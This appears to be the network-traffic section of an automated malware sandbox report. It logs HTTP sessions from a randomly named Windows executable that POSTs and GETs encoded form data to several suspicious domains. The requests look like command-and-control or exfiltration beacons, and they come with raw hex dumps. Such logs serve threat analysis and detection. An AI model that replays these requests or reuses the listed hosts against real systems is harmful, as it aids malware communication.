Jan 7, 2025 12:24:36.281533957 CET	1236	IN	Data Raw: 22 36 70 ea ea 54 28 75 35 46 dd c8 f7 32 8b e4 14 45 7d 59 b1 5d 7a 1c ba 8e 36 29 57 c5 01 80 3a 0a ca 32 1e 21 53 86 aa a3 55 a1 08 47 80 6a eb 6c 3f d2 05 9a 32 09 a2 f9 44 1a 79 49 80 1d 1d 5b 4f a7 54 3b 84 56 90 2a 2f b5 57 81 21 d7 d9 85 Data Ascii: "6pT(u5F2E}Y]z6)W:2!SUGjl?2DyI[OT;V*/W!GC\|TI]%E]R>R?j2dN)etKJ+S)wut5C>gz^ )O G@H-I}W!)o4[",>@'-Ap3R+U
Jan 7, 2025 12:24:36.281547070 CET	1236	IN	Data Raw: 2d b3 2f 2e 2e 6e 3a 7e b0 ae 85 15 e7 e6 8f c0 86 f1 3c 96 07 5f 60 c7 53 01 67 61 93 45 40 51 e4 69 4a c4 95 05 4d 4b fa 43 3a 27 51 f0 6f 61 50 b3 86 d9 92 2f fe 77 93 94 18 09 9b 2b b9 24 69 9c 8c 35 30 85 da ed 0d 39 6e 81 35 35 4a c4 cb 12 Data Ascii: -/..n:~<_`SgaE@QiJMKC:'QoaP/w+$i509n55JIoo:6VPpBus\HCiG1Y8[mHBiY^qOSJpk4heboz=0KHSH"(\X6PE?!orO
Jan 7, 2025 12:24:36.282264948 CET	685	IN	Data Raw: 71 32 85 2d ab 75 a9 6b c1 68 99 e7 5e 94 f6 58 af 76 f6 58 af c0 04 b4 66 ab 48 0e 13 ad 36 7a 00 3d 84 7d 61 0f 8d 91 1f 7b 2b 58 e1 63 71 55 ba 90 fe 6f 64 49 af c5 21 40 34 46 9e b8 d3 98 78 b4 d5 d9 db 42 e9 e8 e8 aa bc 99 7a d5 16 88 35 44 Data Ascii: q2-ukh^XvXfH6z=}a{+XcqUodI!@4FxBz5D?[P^I[P^m<F~;zR $N{Lno<Clhm)"qe"}]n_:+&aXa+"abjY[KV#SoBUp++^1bY"^(?iX#08

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	172.67.148.216	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:37.462930918 CET	10924	OUT	POST /c83d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.overlayoasis.quest Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.overlayoasis.quest Referer: http://www.overlayoasis.quest/c83d/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 75 7a 37 54 58 54 39 64 47 4f 64 33 31 64 6e 78 69 51 66 50 42 35 46 43 45 62 56 55 4e 34 39 69 73 48 2f 39 31 4e 4a 51 58 52 46 6b 51 66 4d 79 47 61 44 62 50 66 6a 65 77 47 31 32 6a 43 77 65 49 34 4b 4a 62 39 69 4e 70 50 5a 6f 38 66 64 65 6e 4c 33 59 39 43 4e 61 78 44 50 38 30 39 4a 4c 6e 47 7a 5a 7a 51 73 6f 43 36 39 42 76 30 51 35 55 43 43 57 71 4b 32 33 31 72 78 66 49 59 58 4e 68 57 4e 4a 52 36 6a 37 37 54 54 67 31 31 33 55 31 77 79 72 42 2f 4a 36 72 2b 38 34 59 35 58 6d 76 43 45 38 6d 54 58 6d 4b 4c 75 48 64 76 54 46 72 77 6e 49 51 36 72 36 61 6e 7a 59 63 6a 2b 68 45 59 69 46 6b 55 49 4e 75 4b 32 5a 74 61 43 51 57 6e 56 79 44 36 77 6f 37 5a 4a 34 74 64 49 5a 62 77 42 52 6f 76 6f 63 51 5a 66 55 72 77 38 39 4a 6e 49 4f 70 4c 58 36 72 5a 47 78 71 38 74 79 6b 78 4f 54 47 42 36 6d 32 43 68 6d 4e 30 66 2b 35 42 51 6f 47 6b 74 67 70 7a 64 44 49 63 76 57 34 34 6a 75 75 43 55 68 6e 38 2f 6b 7a 36 44 55 33 55 68 66 73 43 39 6b 46 79 48 46 63 46 52 52 45 30 68 6e 79 4c 45 56 45 [TRUNCATED] Data Ascii: Jz1hrtoh=uz7TXT9dGOd31dnxiQfPB5FCEbVUN49isH/91NJQXRFkQfMyGaDbPfjewG12jCweI4KJb9iNpPZo8fdenL3Y9CNaxDP809JLnGzZzQsoC69Bv0Q5UCCWqK231rxfIYXNhWNJR6j77TTg113U1wyrB/J6r+84Y5XmvCE8mTXmKLuHdvTFrwnIQ6r6anzYcj+hEYiFkUINuK2ZtaCQWnVyD6wo7ZJ4tdIZbwBRovocQZfUrw89JnIOpLX6rZGxq8tykxOTGB6m2ChmN0f+5BQoGktgpzdDIcvW44juuCUhn8/kz6DU3UhfsC9kFyHFcFRRE0hnyLEVE7ypxVrFxr0ejQUHrd8ADRuDwLYtm/9kW1GANFpSgooVC6Q+jPvFPLfbqB2FRuxitFwabtxAcSx+v9lXdw1zz8eqCR9ZVCsaKw6FNfBUZEn56pyTScgPKj/4S/AMqazJiqaBgtzdUOdBYl+VmdNFZjUpdMTGn35JNnpdi5qHvFBCeyiwMBI7yiXCjBm0uspC4qPBXVcaK91ev30XZpCxhMJ9JVLjl6IWMWZDUqRESdi10it3/WXCFwXdMORrT5d1gEnmiZCnSVp/vpUSP9K5koApRngF0mhLQ1I1tTGsNfnKy1bih/OXvFytxNv9VWthgOCRAJ8tcDKtNfOlq+uAohsF2cjrrZWSJVRk6BiAeYgwcCPGNpjxKGY31zWJIuCctSSyXDohNTKDdmbxKVTtvkLE/nlRaeH7Evn/rcwevJKC16y+1mt3zOQ8sEQQ2YM0x1xL6a6VCW3DmKX7xRRTcWlDWStxbMotVlbVa9Rvs1SDd/H8OZPxnFMs77E51FpJknXE/UHmSTyVebPVVO5S8ji72t2t8+8T6MEEhYb5PbjRyxEr3+6JzAmtJXRdzJ37EfJIA0ToJHQBhiTcHqqKPsYqR8aH6APsEuoLztmLYJhDvgcETgwWy9DHtb5SJMGgFtfYsAsUep1C5RQgIi068pSDBDRCbdvcUjX [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	172.67.148.216	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:40.003541946 CET	548	OUT	GET /c83d/?Jz1hrtoh=jxTzUjVIZaofx7j+hjDqGolTZ9ADAJhT1kOq3tJuXTxbUN1TAIK6B8Trk2pOixsdDrzfQtiDoeEPrKkrg6mu919pzDDap9RanmPGwUgvds1osF4yHymni40=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.overlayoasis.quest Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:24:41.321331024 CET	1114	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 07 Jan 2025 11:24:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://overlayoasis.quest/c83d/?Jz1hrtoh=jxTzUjVIZaofx7j+hjDqGolTZ9ADAJhT1kOq3tJuXTxbUN1TAIK6B8Trk2pOixsdDrzfQtiDoeEPrKkrg6mu919pzDDap9RanmPGwUgvds1osF4yHymni40=&UdJ=uBcLexhXPjVX9H cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJ6NmmRJVpvfKfTi7Mo%2FiEH%2Bz6PYy6cvBUjonP3brE826LWJggMEdcdrYOI0uypCCcLYClgSy%2Fd8vvtE3TomIllHF97JdRIwRW6EhTNiRVjaELFAY1KdVDVXBetBhjpr9RfRj0SdFeRP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe395308e7b42da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=548&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:46.424177885 CET	801	OUT	POST /7nib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.sutbkn.info Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.sutbkn.info Referer: http://www.sutbkn.info/7nib/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6a 49 35 78 66 36 65 55 6d 79 73 6a 4e 72 30 32 35 2f 62 6b 73 38 68 67 33 49 72 46 45 37 69 7a 4a 72 59 64 59 33 50 55 50 2b 47 50 39 7a 5a 64 46 57 41 71 67 77 69 69 6f 6b 74 54 4b 61 66 5a 78 48 69 54 44 46 5a 5a 36 77 47 77 43 7a 4b 74 72 6b 39 54 56 78 32 6a 64 38 4c 32 62 59 4b 50 44 56 63 58 79 74 4f 4a 31 65 55 51 51 50 79 33 57 7a 46 65 64 37 2f 64 45 30 7a 65 67 79 5a 76 54 74 56 30 6a 32 45 74 34 71 70 66 4b 48 2f 7a 68 64 35 42 6d 53 53 46 4c 36 6e 69 38 52 7a 33 57 71 41 48 56 47 6f 37 77 71 43 31 36 32 79 37 58 2b 57 58 55 61 36 59 58 67 33 44 71 64 4e 76 71 51 3d 3d Data Ascii: Jz1hrtoh=jI5xf6eUmysjNr025/bks8hg3IrFE7izJrYdY3PUP+GP9zZdFWAqgwiioktTKafZxHiTDFZZ6wGwCzKtrk9TVx2jd8L2bYKPDVcXytOJ1eUQQPy3WzFed7/dE0zegyZvTtV0j2Et4qpfKH/zhd5BmSSFL6ni8Rz3WqAHVGo7wqC162y7X+WXUa6YXg3DqdNvqQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:48.973989010 CET	821	OUT	POST /7nib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.sutbkn.info Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.sutbkn.info Referer: http://www.sutbkn.info/7nib/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6a 49 35 78 66 36 65 55 6d 79 73 6a 4d 4c 6b 32 71 6f 33 6b 6b 38 68 2f 79 49 72 46 53 4c 69 6f 4a 72 55 64 59 32 37 36 4d 4c 32 50 39 53 70 64 45 53 73 71 6a 77 69 69 6e 45 74 53 48 36 66 65 78 48 76 75 44 48 4e 5a 36 77 53 77 43 77 65 74 72 33 6c 63 56 68 32 6c 56 63 4c 30 55 34 4b 50 44 56 63 58 79 74 79 76 31 65 38 51 54 2b 43 33 56 53 46 64 54 62 2f 61 48 30 7a 65 72 53 5a 72 54 74 56 4b 6a 33 59 48 34 76 74 66 4b 46 58 7a 68 6f 56 43 73 53 53 66 46 61 6d 48 36 54 6a 35 51 4c 73 4d 66 6d 49 70 2f 70 6e 55 2f 77 2f 68 47 50 33 41 47 61 65 72 4b 6e 2b 33 6e 65 77 6d 78 66 31 50 48 46 4d 68 79 62 32 57 37 62 2f 51 4a 69 2b 4b 6b 55 6f 3d Data Ascii: Jz1hrtoh=jI5xf6eUmysjMLk2qo3kk8h/yIrFSLioJrUdY276ML2P9SpdESsqjwiinEtSH6fexHvuDHNZ6wSwCwetr3lcVh2lVcL0U4KPDVcXytyv1e8QT+C3VSFdTb/aH0zerSZrTtVKj3YH4vtfKFXzhoVCsSSfFamH6Tj5QLsMfmIp/pnU/w/hGP3AGaerKn+3newmxf1PHFMhyb2W7b/QJi+KkUo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:51.527436972 CET	10903	OUT	POST /7nib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.sutbkn.info Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.sutbkn.info Referer: http://www.sutbkn.info/7nib/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6a 49 35 78 66 36 65 55 6d 79 73 6a 4d 4c 6b 32 71 6f 33 6b 6b 38 68 2f 79 49 72 46 53 4c 69 6f 4a 72 55 64 59 32 37 36 4d 4b 69 50 39 46 42 64 45 7a 73 71 69 77 69 69 35 55 74 58 48 36 65 43 78 48 48 71 44 48 42 6a 36 7a 71 77 44 53 47 74 36 57 6c 63 41 52 32 6c 58 63 4c 33 62 59 4b 61 44 56 73 4c 79 74 43 76 31 65 38 51 54 39 4b 33 44 7a 46 64 52 62 2f 64 45 30 7a 6b 67 79 5a 44 54 73 78 38 6a 30 30 39 34 37 5a 66 4b 6c 6e 7a 79 71 4e 43 75 79 53 42 47 61 6d 6c 36 54 75 37 51 4c 68 31 66 6d 38 48 2f 71 37 55 2b 57 53 4e 62 76 33 72 63 73 61 53 64 30 62 53 68 70 55 52 78 2f 73 30 44 46 6f 44 6e 37 4c 2f 68 4a 79 39 57 6d 43 61 6c 52 75 34 36 50 36 6f 68 6a 2b 51 6b 30 53 6a 75 4d 37 79 45 63 68 44 6d 49 52 33 6d 77 35 48 48 51 47 4e 63 49 72 35 6c 4b 69 2b 71 75 43 56 54 79 66 2f 68 48 55 43 46 4b 48 74 30 71 59 33 57 56 65 75 31 58 76 7a 4e 34 2f 47 45 6c 6c 4a 48 78 53 45 4a 47 57 54 65 47 4d 4f 73 6f 43 50 53 37 35 72 39 47 6d 43 62 59 39 45 36 71 69 75 35 42 31 42 50 [TRUNCATED] Data Ascii: Jz1hrtoh=jI5xf6eUmysjMLk2qo3kk8h/yIrFSLioJrUdY276MKiP9FBdEzsqiwii5UtXH6eCxHHqDHBj6zqwDSGt6WlcAR2lXcL3bYKaDVsLytCv1e8QT9K3DzFdRb/dE0zkgyZDTsx8j00947ZfKlnzyqNCuySBGaml6Tu7QLh1fm8H/q7U+WSNbv3rcsaSd0bShpURx/s0DFoDn7L/hJy9WmCalRu46P6ohj+Qk0SjuM7yEchDmIR3mw5HHQGNcIr5lKi+quCVTyf/hHUCFKHt0qY3WVeu1XvzN4/GEllJHxSEJGWTeGMOsoCPS75r9GmCbY9E6qiu5B1BPwf6plc4XOTm4Oc1b07q8S1sPBuUyz3Kfx+TRuxjKajsWxOoQlH25XRiVOJDzYZ1i1vN4UGRwQVP8OjqUNNVj+3sVczNcRc9BUKXVFG72Bw6i/2+0pOlbx4nS7rluG8d2gw8H5JtVqLy9wqsom2pMWEUrVB2DbdVHkxA6rvuvV7im+lhvtAmMr6yE+E20V4sx0R6GtHgsb2YCQEt9viAWhsDMvATx2Mfm/hEeTeg6iTDerc24m0o7qCxrZFF3MjB1v9xiI5t/93UnYPX/0LnN2BZQ+eokvc5XPvUXYSLHGiNsskRKbHvdFqnW5zCTYKTN0lB5vll2SiqkeQwspAjR6S9wE59HRcnonZg2JgtaQzi5tHu6fG1SuPU2M2Hp3kd5R9Bgd07QUsQaDQFXFLXbdVc0ASqGVg3ww27iammffklk5i40rnFZowScFYXyoL13sAIFPGUslHQY5DgxOPr7vGCsHA7O0iDt7o6OSsJFUb/MMPLk0F6chxH5eifIsmXoDzOsdybMY+H1SVp3db2ia9JDqzqX8kYsVgsXN9RNBPSqu7mgQ9/vZx1WUfhEbfw7qTQi0n9rxsL/vyth15JyckLgo4ngv6fqyDVTij21JlkMTa8mFCyV8bw6lLA4tjiix75N32b/DrTuUS3JwwX6HXPeRxv7lyAbBo [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:54.069283009 CET	541	OUT	GET /7nib/?Jz1hrtoh=uKRRcKiI80JDE6w59YL8qO1xlerNcpHcKbVaQWL/Xt+siAoLAxBeiwuetBJvIJ3z2UyZcnBi9xP8ZgG+7UIAbjCkdt+hLoeNA1o349OPobYNbOTqAVNYTqM=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.sutbkn.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:24:58.676512003 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 11:24:58 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	199.192.21.169	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:03.793482065 CET	810	OUT	POST /stiu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.lonfor.website Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lonfor.website Referer: http://www.lonfor.website/stiu/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 48 73 48 4c 50 4b 56 6b 43 48 74 7a 4a 72 4a 72 6c 6d 71 49 6a 43 49 4c 74 71 42 37 79 74 59 71 31 31 39 62 71 74 4a 35 43 6d 30 2f 4e 45 53 5a 77 38 32 34 2b 55 6c 42 71 42 4c 31 38 6f 55 4f 6b 6c 72 51 58 44 7a 7a 6a 6f 49 39 38 6c 68 4d 68 50 66 7a 52 41 34 61 30 41 68 4e 38 76 44 52 4c 59 58 74 51 6b 62 71 4a 4b 4d 71 33 31 48 78 6b 37 36 54 6e 61 61 38 49 39 35 67 4b 69 54 78 67 50 7a 42 30 31 62 46 64 6d 44 43 43 37 30 6a 44 42 72 73 35 70 51 6d 70 49 68 56 45 59 47 44 6f 5a 4f 36 6d 39 6e 69 4e 55 71 68 69 39 65 39 5a 39 68 46 4f 32 49 4b 6b 72 65 53 53 39 53 55 73 77 3d 3d Data Ascii: Jz1hrtoh=HsHLPKVkCHtzJrJrlmqIjCILtqB7ytYq119bqtJ5Cm0/NESZw824+UlBqBL18oUOklrQXDzzjoI98lhMhPfzRA4a0AhN8vDRLYXtQkbqJKMq31Hxk76Tnaa8I95gKiTxgPzB01bFdmDCC70jDBrs5pQmpIhVEYGDoZO6m9niNUqhi9e9Z9hFO2IKkreSS9SUsw==
Jan 7, 2025 12:25:04.371352911 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 11:25:04 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	199.192.21.169	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:06.401144981 CET	830	OUT	POST /stiu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.lonfor.website Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lonfor.website Referer: http://www.lonfor.website/stiu/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 48 73 48 4c 50 4b 56 6b 43 48 74 7a 47 72 35 72 6e 42 2b 49 72 43 49 4b 75 71 42 37 34 4e 59 75 31 31 68 62 71 70 35 70 43 55 67 2f 4e 6c 69 5a 69 4e 32 34 75 45 6c 42 69 68 4c 30 78 49 55 56 6b 6c 6d 6c 58 44 2f 7a 6a 6f 63 39 38 6c 52 4d 69 38 33 77 44 67 34 59 76 77 68 54 7a 50 44 52 4c 59 58 74 51 6b 4f 78 4a 4b 55 71 33 45 33 78 6c 66 75 51 37 4b 61 2f 50 39 35 67 4f 69 54 31 67 50 7a 6a 30 30 48 37 64 6a 66 43 43 2b 59 6a 41 54 54 72 67 5a 51 6b 74 49 67 66 4b 64 6e 78 67 38 33 78 67 39 4b 43 43 33 2b 57 6a 37 54 6e 49 4d 41 53 63 32 73 35 35 73 58 6d 66 2b 76 64 33 38 61 2f 67 76 53 78 4c 55 66 45 77 69 47 54 74 62 57 73 49 6d 6f 3d Data Ascii: Jz1hrtoh=HsHLPKVkCHtzGr5rnB+IrCIKuqB74NYu11hbqp5pCUg/NliZiN24uElBihL0xIUVklmlXD/zjoc98lRMi83wDg4YvwhTzPDRLYXtQkOxJKUq3E3xlfuQ7Ka/P95gOiT1gPzj00H7djfCC+YjATTrgZQktIgfKdnxg83xg9KCC3+Wj7TnIMASc2s55sXmf+vd38a/gvSxLUfEwiGTtbWsImo=
Jan 7, 2025 12:25:06.991242886 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 11:25:06 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	199.192.21.169	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
